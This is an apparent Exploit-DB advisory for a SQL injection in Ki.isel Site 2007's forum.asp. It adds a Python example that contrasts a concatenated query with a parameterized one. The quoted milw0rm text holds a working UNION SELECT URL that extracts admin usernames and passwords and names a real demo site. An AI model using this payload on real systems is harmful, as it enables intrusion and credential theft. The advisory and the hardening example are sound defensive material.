Vendor: Ki.isel Site 2007 (tr)
By: cl24zy
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Ki.isel Site 2007 (tr)
Affected Version From: Ki.isel Site 2007 (tr)
Affected Version To: Ki.isel Site 2007 (tr)
Patch Exists: NO
Platforms Tested:
2007

Ki.isel Site 2007 (tr) SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection through the 'forum.asp' page. By manipulating the 'forumid' parameter, an attacker can retrieve sensitive information such as admin usernames and passwords.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
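
An added example, not code from the product or the advisory: it models the forum.asp lookup in Python with sqlite3 rather than the application's ASP, and shows the concatenated query beside a validated, parameterized one. Only the admin table, its kullaniciadi and sifre columns, and the forumid value come from the page; the konular table, its column layout and the sample rows are constructed assumptions.

```python
import sqlite3

# forumid value from the advisory's URL, after URL decoding.
PAGE_VALUE = "-1 union all select 0,kullaniciadi,2,3,sifre,5,6,7 from admin"

def make_db():
    # Constructed schema and rows. The 8-column "konular" (topics) table is an
    # assumption; column 1 is the topic title and column 4 the author.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE konular (id INTEGER, baslik TEXT, c2, c3, yazan TEXT,
                              c5, c6, forumid INTEGER);
        CREATE TABLE admin (kullaniciadi TEXT, sifre TEXT);
        INSERT INTO konular VALUES (1, 'Welcome', 0, 0, 'guest', 0, 0, 1);
        INSERT INTO admin VALUES ('site_admin', 'constructed-secret');
    """)
    return db

def topics_vulnerable(db, forumid):
    # 'Before': the parameter is concatenated into the statement, so whatever
    # it contains is parsed as SQL.
    sql = "SELECT * FROM konular WHERE forumid = " + forumid
    return db.execute(sql).fetchall()

def topics_hardened(db, forumid):
    # 'After', step 1: forumid is a numeric key, so accept only a short run
    # of ASCII digits and reject everything else before touching the database.
    if not (forumid.isascii() and forumid.isdigit()) or len(forumid) > 9:
        raise ValueError("forumid must be a non-negative integer")
    # Step 2: bind the value; the statement text never changes.
    sql = "SELECT * FROM konular WHERE forumid = ?"
    return db.execute(sql, (int(forumid),)).fetchall()

def binding_alone(db, forumid):
    # Binding without validation: the whole string is compared as one value,
    # so it matches no row instead of extending the query.
    sql = "SELECT * FROM konular WHERE forumid = ?"
    return db.execute(sql, (forumid,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", topics_vulnerable(db, PAGE_VALUE))
    print("bound only:  ", binding_alone(db, PAGE_VALUE))
    print("hardened, forumid=1:", topics_hardened(db, "1"))
```

The hardened function rejects the advisory's value with a ValueError; a handler should map that to an error response without echoing database details.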

Exploit-DB raw data:

###############################################################
#Ki.isel Site 2007 (tr) == SQL Injection Vulnerability
#Author : cl24zy
#Site : www.hacklive.org , www.illegal-attack.org
#Contact: admin@hacklive.org
###############################################################
#Download Ki.isel Site 2007 (tr) : http://www.aspindir.com/goster/4693
#Demo : http://www.gazilogo.com/personel/

#Exploit;
#Admin Nick, Passport;
http://[SITE]/forum.asp?sayfa=konular&forumid=-1%20union+all+select+0,kullaniciadi,2,3,sifre,5,6,7+from+admin

#Union data Text;
#Konu Ba.l.klar. : Admin UserName
#Yazan : Admin Password

# iLLeGaL-ATTaCK//TiM & HacKLivETeaM
################################################################

# milw0rm.com [2007-02-06]